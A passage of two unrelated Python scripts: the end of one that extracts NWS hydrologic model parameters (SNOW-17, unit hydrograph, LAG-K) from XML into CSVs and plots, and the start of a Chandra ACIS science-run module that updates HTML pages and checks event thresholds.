section = txt_file.readlines()[line_num+7:line_num+8]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SEP_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+8:line_num+9]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('OCT_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+9:line_num+10]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('NOV_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+10:line_num+11]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('DEC_ET,' + line + '\n')
txt_file.close()
output_file.close()
#Delete temporary .txt file holding .xml contents
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt')
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SACSMA_Params.txt')
csv_file.write('\n')
print 'Total SAC-SMA files extracted: ' + str(basin_count)
csv_file.close()
###############################################################################################################################################################
#SNOW-17 SECTION---------------------------------------------------------------
#loop through SACSMA files in folderPath
if snow == 'on':
print 'Processing SNOW-17 parameters...'
csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_SNOW17_Params_' + param_source + '.csv', 'w')
csv_file.write('BASIN,NAME,ALAT,ELEV,TAELEV,PXADJ,SCF,MFMAX,MFMIN,UADJ,SI,NMF,TIPM,'\
'MBASE,PXTEMP,PLWHC,DAYGM,MV,SASC_INT,SNSG_INT,SWE_INT,SCTOL,WETOL,' + '\n')
for filename in glob.glob(os.path.join(folderPath, "SNOW*.xml")):
#print filename
#Define output file name
name = str(os.path.basename(filename)[:])
name = name.replace('SNOW17_', '')
name = name.replace('_UpdateStates.xml', '')
spl_name = name.split('_')[1]
#print name
csv_file.write(name + ',')
csv_file.write(spl_name + ',')
#Open .xml file and temporary .txt file to write .xml contents to
xml_file = open(filename, 'r')
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w')
#Write contents of .xml file to the temporary .txt file
for line in xml_file:
txt_file.write(line)
#Close the open files
xml_file.close()
txt_file.close()
#Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r')
output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SNOW17_Params.txt', 'w')
#Write data headers
output_file.write('PARAMETER,VALUE' + '\n')
###ALAT
#Find line number with ALAT value
#Line number is saved when loop breaks
line_num = 0
for line in txt_file:
line_num += 1
if 'ALAT' in line:
break
#Set cursor back to beginning of txt_file that is being read
txt_file.seek(0)
#Section/line of .txt file with desired parameter value
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
#Write only numbers and decimals to output file
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('ALAT,' + line + '\n')
###ELEV
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'ELEV' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('ELEV,' + line + '\n')
###TAELEV
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'TAELEV' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('TAELEV,' + line + '\n')
###PXADJ
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PXADJ' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PXADJ,' + line + '\n')
###SCF
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SCF' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SCF,' + line + '\n')
###MFMAX
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'MFMAX' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MFMAX,' + line + '\n')
###MFMIN
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'MFMIN' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MFMIN,' + line + '\n')
###UADJ
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'UADJ' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('UADJ,' + line + '\n')
###SI
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SI' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SI,' + line + '\n')
###NMF
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'NMF' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('NMF,' + line + '\n')
###TIPM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'TIPM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('TIPM,' + line + '\n')
###MBASE
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'MBASE' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MBASE,' + line + '\n')
###PXTEMP
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PXTEMP' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PXTEMP,' + line + '\n')
###PLWHC
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PLWHC' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PLWHC,' + line + '\n')
###DAYGM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'DAYGM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('DAYGM,' + line + '\n')
###MV
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'MV' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MV,' + line + '\n')
###SASC_OUTPUT_TS_INTERVAL
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SASC_OUTPUT_TS_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SASC_OUTPUT_TS_INTERVAL,' + line + '\n')
###SNSG_OUTPUT_TS_INTERVAL
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SNSG_OUTPUT_TS_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SNSG_OUTPUT_TS_INTERVAL,' + line + '\n')
###SWE_OUTPUT_TS_INTERVAL
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SWE_OUTPUT_TS_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SWE_OUTPUT_TS_INTERVAL,' + line + '\n')
###SCTOL
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SCTOL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SCTOL,' + line + '\n')
###WETOL
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'WETOL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('WETOL,' + line + '\n' + '\n')
###AREA_DEPLETION_CURVE
output_file.write('\n' + 'AREA_DEPLETION_CURVE' + '\n')
txt_file.seek(0)
i = 0
for line in txt_file:
if 'row A' in line and 'B=' not in line:
i += 1
line = re.sub("[^0123456789\.\-]", "", line)
output_file.write(str(i) + ',' + line + '\n')
###AREA_ELEVATION_CURVE
output_file.write('\n' + 'AREA_ELEVATION_CURVE' + '\n')
txt_file.seek(0)
AREA = []
ELEV = []
for line in txt_file:
if 'row A' in line and 'B=' in line:
line = re.sub("[^0123456789\.\-\"]", "", line)
line = line.replace('""', ',')
line = line.replace ('"', '')
s1,s2 = line.split(',')
AREA.append(s2)
ELEV.append(s1)
output_file.write(line + '\n')
if len(AREA) > 0:
fig, ax1 = plt.subplots()
#Plot the data
ax1.plot(ELEV, AREA, color='black', label='AEC', linewidth='2', zorder=5)
ax1.plot(ELEV, AREA, 'o', color='black', ms=8, zorder=5, alpha=0.75)
#ax1.fill_between(x, AREA,facecolor='gray', alpha=0.25)
#ax1.minorticks_on()
ax1.grid(which='major', axis='both', color='black', linestyle='-', zorder=3)
ax1.grid(which='minor', axis='both', color='grey', linestyle='-', zorder=3)
majorLocator = MultipleLocator(.10)
ax1.yaxis.set_major_locator(majorLocator)
ax1.xaxis.set_minor_locator(AutoMinorLocator(2))
ax1.set_xlabel('Elevation')
ax1.set_ylabel('Area (% Below)')
ax1.set_ylim([-0.05,1.05])
#add plot legend with location and size
ax1.legend(loc='upper left', prop={'size':10})
plt.title(name + ' Area Elevation Curve')
figname = maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\AEC_plots\\' + name + '_AEC.png'
plt.savefig(figname, dpi=100)
plt.clf()
plt.close()
#Turn interactive plot mode off (don't show figures)
plt.ioff()
txt_file.close()
output_file.close()
#Delete temporary .txt file holding .xml contents
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt')
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SNOW17_Params.txt')
csv_file.write('\n')
csv_file.close()
###############################################################################################################################################################
#UNIT HG SECTION---------------------------------------------------------------
#loop through UNITHG .xlm files in folderPath
if uh == 'on':
print 'Processing UH parameters...'
csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_UHG_Params_' + param_source + '.csv', 'w')
csv_file.write('BASIN, AREA (mi2), Interval (hours),')
t = 0
while t < 600:
csv_file.write(str(t) + ',')
t += 6
csv_file.write('\n')
for filename in glob.glob(os.path.join(folderPath, "UNITHG*.xml")):
#print filename
#Define output file name
name = str(os.path.basename(filename)[:])
name = name.replace('UNITHG_', '')
name = name.replace('_UpdateStates.xml', '')
#print name
csv_file.write(name + ',')
#Open .xml file and temporary .txt file to write .xml contents to
xml_file = open(filename, 'r')
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w')
#Write contents of .xml file to the temporary .txt file
for line in xml_file:
txt_file.write(line)
#Close the open files
xml_file.close()
txt_file.close()
#Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r')
output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_UNITHG_Params.txt', 'w')
#Write data headers
output_file.write('PARAMETER,VALUE' + '\n')
###UHG_DURATION
#Find line number with UHG_DURATION value
#Line number is saved when loop breaks
line_num = 0
for line in txt_file:
line_num += 1
if 'UHG_DURATION' in line:
break
#Set cursor back to beginning of txt_file that is being read
txt_file.seek(0)
#Section/line of .txt file with desired parameter value
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
#Write only numbers and decimals to output file
line = re.sub("[^0123456789\.\-]", "", line)
output_file.write('UHG_DURATION,' + line + '\n')
###DRAINAGE_AREA
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'DRAINAGE_AREA' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
area = line
csv_file.write(area + ',')
output_file.write('DRAINAGE_AREA,' + line + '\n')
###UHG_INTERVAL
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'UHG_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
interval = line
csv_file.write(interval + ',')
output_file.write('UHG_INTERVAL,' + line + '\n')
###CONSTANT_BASE_FLOW
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'CONSTANT_BASE_FLOW' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
#const_bf = line
#csv_file.write(const_bf + ',')
output_file.write('CONSTANT_BASE_FLOW,' + line + '\n')
###UHG_ORDINATES
output_file.write ('\n' + 'UHG_ORDINATES' + '\n')
output_file.write('0,0' + '\n')
txt_file.seek(0)
UHG_time = []
UHG_flow = []
#Set time 0 values
ordinate = 0
flow = 0
csv_file.write('0' + ',')
UHG_time.append(ordinate)
UHG_flow.append(ordinate)
for line in txt_file:
if 'row A' in line:
ordinate = ordinate + 6
UHG_time.append(ordinate)
line = re.sub("[^0123456789\.\-]", "", line)
line_float = float(line)
csv_file.write(line + ',')
UHG_flow.append(line_float)
output_file.write(str(ordinate) + ',' + line + '\n')
#Get max UHG time value
max_time = numpy.max(UHG_time)
x = range(0,max_time+6,6)
if uh_plots == 'on':
fig, ax1 = plt.subplots()
#Plot the data
ax1.plot(UHG_time, UHG_flow, color='black', label='UHG', linewidth='2', zorder=5)
ax1.plot(UHG_time, UHG_flow, 'o', color='black', ms=4, zorder=5, alpha=0.75)
ax1.fill_between(x,UHG_flow,facecolor='gray', alpha=0.25)
#ax1.minorticks_on()
ax1.grid(which='major', axis='both', color='black', linestyle='-', zorder=3)
ax1.grid(which='minor', axis='both', color='grey', linestyle='-', zorder=3)
majorLocator = MultipleLocator(6)
ax1.xaxis.set_major_locator(majorLocator)
ax1.yaxis.set_minor_locator(AutoMinorLocator(2))
ax1.set_xlabel('Time (hr)')
ax1.set_ylabel('Flow (cfs)')
#Make tick labels smaller/rotate for long UHGs
if max_time >= 100:
for label in ax1.xaxis.get_ticklabels():
label.set_fontsize(8)
if max_time >= 160:
for label in ax1.xaxis.get_ticklabels():
label.set_fontsize(6)
plt.xticks(rotation=90)
majorLocator = MultipleLocator(12)
ax1.xaxis.set_major_locator(majorLocator)
ax1.set_xlim([0,max_time+3])
plt.ylim(ymin=0)
#add plot legend with location and size
ax1.legend(loc='upper right', prop={'size':10})
plt.title(name + ' UHG / ' + 'Area (mi2) = ' + area)
figname = maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\UHG_plots\\' + name + '_UHG.png'
plt.savefig(figname, dpi=100)
plt.clf()
plt.close()
#Turn interactive plot mode off (don't show figures)
plt.ioff()
txt_file.close()
output_file.close()
csv_file.write('\n')
#Delete temporary .txt file holding .xml contents
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt')
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_UNITHG_Params.txt')
csv_file.close()
###############################################################################################################################################################
#LAG-K SECTION---------------------------------------------------------------
#loop through Lag-K .xlm files in folderPath
if lag_k == 'on':
print 'Processing LAG-K parameters...'
csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_LAGK_Params_' + param_source + '.csv', 'w')
csv_file.write('BASIN,Current Outflow,Current Storage,JK,JLAG,LAG1,Q1,LAG2,Q2,LAG3,Q3,LAG4,Q4,LAG5,Q5,LAG6,Q6,LAG7,Q7,LAG8,Q8,LAG9,Q9,LAG10,Q10,LAG11,Q11,LAG12,Q12,LAG13,Q13,LAG14,Q14,K1,KQ1,K2,KQ2,K3,KQ3,K4,KQ4,K5,KQ5,K6,KQ6,K7,KQ7,K8,KQ8,K9,KQ9,K10,KQ10,K11,KQ11,K12,KQ12,K13,KQ13,K14,KQ14'+'\n')
basin_count = 0
for filename in glob.glob(os.path.join(folderPath, "LAGK*.xml")):
#print filename
lag_time = []
lag_Q = []
K_time = []
K_Q = []
#Define output file name
name = str(os.path.basename(filename)[:])
name = name.replace('LAGK_', '')
name = name.replace('_UpdateStates.xml', '')
#print name
csv_file.write(name + ',')
#Open .xml file and temporary .txt file to write .xml contents to
xml_file = open(filename, 'r')
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w')
#Write contents of .xml file to the temporary .txt file
for line in xml_file:
txt_file.write(line)
#Close the open files
xml_file.close()
txt_file.close()
#Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r')
output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_LAGK_Params.txt', 'w')
### CURRENT_OUTFLOW
#Find line number with CURRENT_OUTFLOW value
#Line number is saved when loop breaks
line_num = 0
check = 'na'
for line in txt_file:
line_num += 1
if 'CURRENT_OUTFLOW' in line:
check = 'go'
break
#Set cursor back to beginning of txt_file that is being read
txt_file.seek(0)
#Section/line of .txt file with desired parameter value
section = txt_file.readlines()[line_num:line_num+1]
if check != 'go':
csv_file.write('na,')
output_file.write('CURRENT_OUTFLOW,' + 'na' + '\n')
else:
for line in section:
#Write only numbers and decimals to output file
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('CURRENT_OUTFLOW,' + line + '\n')
### CURRENT_STORAGE
txt_file.seek(0)
line_num = 0
check = 'na'
for line in txt_file:
line_num += 1
if 'CURRENT_STORAGE' in line:
check = 'go'
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
if check != 'go':
csv_file.write('na,')
output_file.write('CURRENT_STORAGE,' + 'na' + '\n')
else:
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('CURRENT_STORAGE,' + line + '\n')
### Inflow Basin
txt_file.seek(0)
line_num = 0
check = 'na'
for line in txt_file:
line_num += 1
if 'TSIDA' in line:
check = 'go'
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
if check == 'go':
for line in section:
inflow_basin = line[19:-15]
basin_count += 1
### JK
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'id="JK"' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+2]
for line in section:
if '<!--' not in line:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('JK,' + line + '\n')
jk = int(line)
break
### JLAG
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'id="JLAG"' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('JLAG,' + line + '\n')
jlag = int(line)
### LAGQ
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'LAGQ_PAIRS' in line:
break
txt_file.seek(0)
if jlag == 0:
end_line = 3
else:
end_line = (jlag * 2)+2
section = txt_file.readlines()[line_num+2:line_num+end_line]
count = 0
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LAGQ_PAIRS,' + line + '\n')
if count % 2 ==0:
lag_time.append(float(line))
else:
lag_Q.append(float(line))
count += 1
#print lag_time
#print lag_Q
if jlag == 0:
jlag = 1
csv_file.write('0' + ',')
while jlag < 14:
csv_file.write('' + ',' + '' + ',')
jlag += 1
### KQ
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'KQ_PAIRS' in line:
break
txt_file.seek(0)
end_line = (jk * 2)+3
txt_file.seek(0)
if jk == 0:
end_line = 3
else:
end_line = (jk * 2)+2
section = txt_file.readlines()[line_num+2:line_num+end_line]
count = 0
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('KQ_PAIRS,' + line + '\n')
if count % 2 ==0:
K_time.append(float(line))
else:
K_Q.append(float(line))
count += 1
#print K_time
#print K_Q
if jk == 0:
jk = 1
csv_file.write('0' + ',')
while jk < 14:
csv_file.write('' + ',' + '' + ',')
jk += 1
txt_file.close()
output_file.close()
csv_file.write('\n')
#Get max Lag/K time value
max_time = numpy.max(lag_time + K_time)
x = range(0,int(max_time)+6,6)
if lag_plots == 'on' and len(K_time)>1 and len(lag_time)>1:
fig, ax1 = plt.subplots()
#Plot the data
ax1.plot(lag_time, lag_Q, 'g-o', label='LAG', linewidth='2', zorder=5, ms=5)
ax1.plot(K_time, K_Q, 'r-o', label='K', linewidth='2', zorder=5, ms=5)
#ax1.fill_between(x,UHG_flow,facecolor='gray', alpha=0.25)
#ax1.minorticks_on()
ax1.grid(which='major', axis='both', color='black', linestyle='-', zorder=3)
ax1.grid(which='minor', axis='both', color='grey', linestyle='-', zorder=3)
majorLocator = MultipleLocator(6)
ax1.xaxis.set_major_locator(majorLocator)
ax1.yaxis.set_minor_locator(AutoMinorLocator(2))
ax1.set_xlabel('Time (hr)')
ax1.set_ylabel('Flow (cfs)')
#Make tick labels smaller/rotate for long UHGs
if max_time >= 100:
for label in ax1.xaxis.get_ticklabels():
label.set_fontsize(8)
if max_time >= 160:
for label in ax1.xaxis.get_ticklabels():
label.set_fontsize(6)
plt.xticks(rotation=90)
majorLocator = MultipleLocator(12)
ax1.xaxis.set_major_locator(majorLocator)
ax1.set_xlim([0,max_time+3])
plt.ylim(ymin=0)
#add plot legend with location and size
ax1.legend(loc='upper right', prop={'size':10})
plt.title(name[:5] + ': ' + inflow_basin + ' LAG/K Parameters')
figname = maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\LAGK_plots\\' + name + '_lagk.png'
plt.savefig(figname, dpi=100)
plt.clf()
plt.close()
#Delete temporary .txt file holding .xml contents
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt')
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_LAGK_Params.txt')
print 'Total LAG/K files extacted: ' + str(basin_count)
csv_file.close()
###################################################################################################################################
print 'Script Complete'
print str(datetime.now())
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#################################################################################
# #
# acis_sci_run_functions.py: collection of functions used by acis sci run #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Feb 26, 2021 #
# #
#################################################################################
import os
import sys
import re
import string
import random
import time
import Chandra.Time
path = '/data/mta/Script/ACIS/Acis_sci_run/house_keeping/dir_list_py_t'
f = open(path, 'r')
data = [line.strip() for line in f.readlines()]
f.close()
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append a path to a private folder to python directory
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- converTimeFormat contains MTA time conversion routines
#
import mta_common_functions as mcf
#
#--- temp writing file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
http_dir = 'https://cxc.cfa.harvard.edu/mta_days/mta_acis_sci_run/'
#
#--- NOTE:
#--- because we need to run test, web_dir read from dir_list_py cannot be used. instead
#--- we are passing from the main script's web_dir to local html_dir variable. (Apr 26, 2013)
#
#-----------------------------------------------------------------------------------------------
#--- removeDuplicated: remove duplicated entries ---
#-----------------------------------------------------------------------------------------------
def removeDuplicated(ifile):
"""
remove duplicated rows from the file
Input: file --- a file name of the data
Output: file --- cleaned up data
"""
data = mcf.read_data_file(ifile)
if len(data) > 0:
first = data.pop(0)
new = [first]
for ent in data:
chk = 0
for comp in new:
if ent == comp:
chk = 1
break
if chk == 0:
new.append(ent)
#
#--- now print out the cleaned up data
#
with open(ifile, 'w') as f:
for ent in new:
line = ent + '\n'
f.write(line)
#-----------------------------------------------------------------------------------------------
#--- acis_sci_run_print_html: update html pages --
#-----------------------------------------------------------------------------------------------
def acis_sci_run_print_html(html_dir, pyear, pmonth, pday):
"""
update three html pages according for the year (pyear)
Input: html_dir --- web directory path
pyear --- the year you want to update the html pages
pmonth --- current month
pday --- current month date
Output: science_run.html
science_run<year>.html
"""
#
#--- set substitution values
#
pyear = int(pyear)
cpmon = mcf.add_leading_zero(int(float(pmonth)))
cpday = mcf.add_leading_zero(int(float(pday)))
update = str(pyear) + '-' + str(cpmon) + '-' + str(cpday)
ydate = int(float(time.strftime("%j", time.strptime(update, '%Y-%m-%d'))))
#
#--- make a link table
#
ylist = ''
j = 0
for ryear in range(1999, pyear+1):
ylist = ylist + '<td><a href=' + http_dir + '/Year' + str(ryear)
ylist = ylist + '/science_run' + str(ryear) + '.html>'
ylist = ylist + '<strong>Year ' + str(ryear) + '</strong></a><br /><td />\n'
#
#--- every 6 years, break a row
#
if j == 5:
j = 0
ylist = ylist + '</tr><tr>\n'
else:
j += 1
#
#---- update the main html page
#
template = house_keeping + 'science_run.html'
outfile = html_dir + 'science_run.html'
print_html_page(template, update, pyear, ylist, outfile)
#
#--- update sub directory html pages
#
ystop = pyear + 1
for syear in range(1999, ystop):
template = house_keeping + 'sub_year.html'
outfile = html_dir + 'Year' + str(syear) + '/science_run' + str(syear) + '.html'
if syear == pyear:
ldate = update
else:
ldate = str(syear) + '-12-31'
print_html_page(template, ldate, syear, ylist, outfile)
#-----------------------------------------------------------------------------------------------
#-- print_html_page: read template and update the html page --
#-----------------------------------------------------------------------------------------------
def print_html_page(template, update, syear, ylist, outfile):
"""
read template and update the html page
input: template --- the template file name
update --- udated date
syeare --- year
ylist --- html table containing links to sub directories
outfile --- html file name
output: outfile
"""
f = open(template, 'r')
hfile = f.read()
f.close()
temp0 = hfile.replace('#UPDATE#', update)
temp1 = temp0.replace('#YEAR#', str(syear))
temp2 = temp1.replace('#YLIST#', str(ylist))
with open(outfile, 'w') as f:
f.write(temp2)
#-----------------------------------------------------------------------------------------------
#--- checkEvent: check high event/error/drop cases, and send out a warning message if needed ---
#-----------------------------------------------------------------------------------------------
def checkEvent(html_dir, etype, event, year, criteria, dname):
"""
check high event/error/drop cases, and send out a warning message if needed
input: html_dir --- web directory path
etype --- type of error e.g. drop for Te3_3
event --- event name e.g. Te3_3
criteria --- cut off e.g. 3.0 for Te3_3
dname --- table name e.g. drop rate(%)
output: ofile --- updated with newly found violation
"""
#
#----- read the main table and file new entries
#
ifile = html_dir + 'Year' + str(year) + '/' + event + '_out'
cdata = mcf.read_data_file(ifile)
#
#----- check data type: drop rate, high error, and high event
#
mchk = re.search('drop', etype)
mchk2 = re.search('error', etype)
new_list = []
sline = ''
for ent in cdata:
atemp = re.split('\s+', ent)
#
#--- if the case is "drop" rate, the pass the data as it is
#
if mchk is not None:
try:
cval = float(atemp[9]) #--- drop rate
except:
continue
#
#--- otherwise normalize the data
#
else:
cval = 0
try:
val6 = float(atemp[6])
if val6 > 0:
if mchk2 is not None:
cval = float(atemp[8])/val6 #--- high error
else:
cval = float(atemp[7])/val6 #--- high count
except:
continue
#
#--- here is the selection criteria
#
if cval > criteria:
cval = round(cval, 3)
#
#--- limit length of description to 20 letters
#
alen = len(atemp[11])
if alen < 20:
dline = atemp[11]
for i in range(alen, 20):
dline = dline + ' '
else:
dline = ''
for i in range(0, 20):
